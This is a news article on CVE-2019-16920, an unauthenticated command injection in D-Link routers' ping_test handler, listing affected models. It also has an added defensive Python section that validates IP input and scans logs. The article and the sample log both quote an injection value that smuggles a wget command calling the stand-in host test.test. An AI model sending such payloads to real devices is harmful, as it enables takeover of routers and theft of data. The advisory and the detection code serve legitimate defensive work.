Remote exploitation of a vulnerability in D-Link routers

A dangerous vulnerability (CVE-2019-16920) has been identified in D-Link wireless routers. It allows remote code execution on the device by sending a specially crafted request to the "ping_test" handler, which is reachable without authentication.

Notably, according to the firmware developers, the "ping_test" call should only be possible after authentication, but in practice it is invoked regardless of whether the user is logged in to the web interface. In particular, when the "action=ping_test" parameter is passed, the script redirects to the authentication page, but at the same time performs the action associated with ping_test. To execute code, a second vulnerability in ping_test itself was used: it calls the ping utility without properly validating the IP address submitted for testing. For example, to call the wget utility and send the result of the "echo 1234" command to an external host, it is enough to specify the parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$( echo 1234)".
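The two defects described above (a handler reachable before authentication, and a ping target passed to a shell without validation) can be addressed from the defender's side with a strict allow-list check on the target value and by flagging requests in web-server logs where "action=ping_test" carries a "ping_ipaddr" that is not a bare IP address. The following is an added example, not code from the article or from D-Link firmware; the log format, the "/ping_handler" path and the client addresses are constructed placeholders.

```python
import ipaddress
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (placeholder path and clients, not real traffic).
# The second line carries the newline-injection payload quoted in the article.
SAMPLE_LOG = """\
192.0.2.10 - - [26/Sep/2019:10:00:01 +0000] "GET /ping_handler?action=ping_test&ping_ipaddr=192.168.0.1 HTTP/1.1" 200 512
192.0.2.11 - - [26/Sep/2019:10:00:05 +0000] "POST /ping_handler?action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(%20echo%201234) HTTP/1.1" 200 512
192.0.2.12 - - [26/Sep/2019:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 1024
"""


def is_valid_ping_target(value: str) -> bool:
    """Hardened check for the ping_ipaddr parameter (already URL-decoded).

    The value must parse as a single IPv4/IPv6 address and nothing else.
    Newlines, spaces, ';', '$(' and hostnames all fail to parse, so they
    never reach the shell command that wraps the ping utility.
    """
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def suspicious_ping_requests(log_text: str) -> list[dict]:
    """Return clients that sent action=ping_test with a non-IP ping_ipaddr.

    The request line is the quoted field of each log entry; the query string
    is parsed (and percent-decoded) with parse_qs.
    """
    hits = []
    for line in log_text.splitlines():
        try:
            request_line = line.split('"')[1]            # METHOD TARGET VERSION
            _method, target, _version = request_line.split(" ", 2)
        except (IndexError, ValueError):
            continue                                     # not a request log line
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        if query.get("action") != ["ping_test"]:
            continue
        ping_target = query.get("ping_ipaddr", [""])[0]
        if not is_valid_ping_target(ping_target):
            hits.append({"client": line.split(" ", 1)[0], "ping_ipaddr": ping_target})
    return hits
```

Running `suspicious_ping_requests(SAMPLE_LOG)` flags only the second line, whose decoded ping_ipaddr contains a newline followed by a wget command; the benign request with a plain address passes the same validator the hardened handler would use.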


The presence of the vulnerability has been officially confirmed in the following models:

  • DIR-655 with firmware 3.02b05 or later;
  • DIR-866L with firmware 1.03b04 or later;
  • DIR-1565 with firmware 1.01 or later;
  • DIR-652 (no information on affected firmware versions provided)

The support period for these models has already ended, so D-Link stated that it will not release updates to fix the vulnerability, does not recommend using them, and advises replacing them with newer devices. As a protective workaround, access to the web interface can be restricted to trusted IP addresses only.

It was later found that the vulnerability also affects the DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 and DIR-825 models, for which plans to release updates are not yet known.

Source: opennet.ru
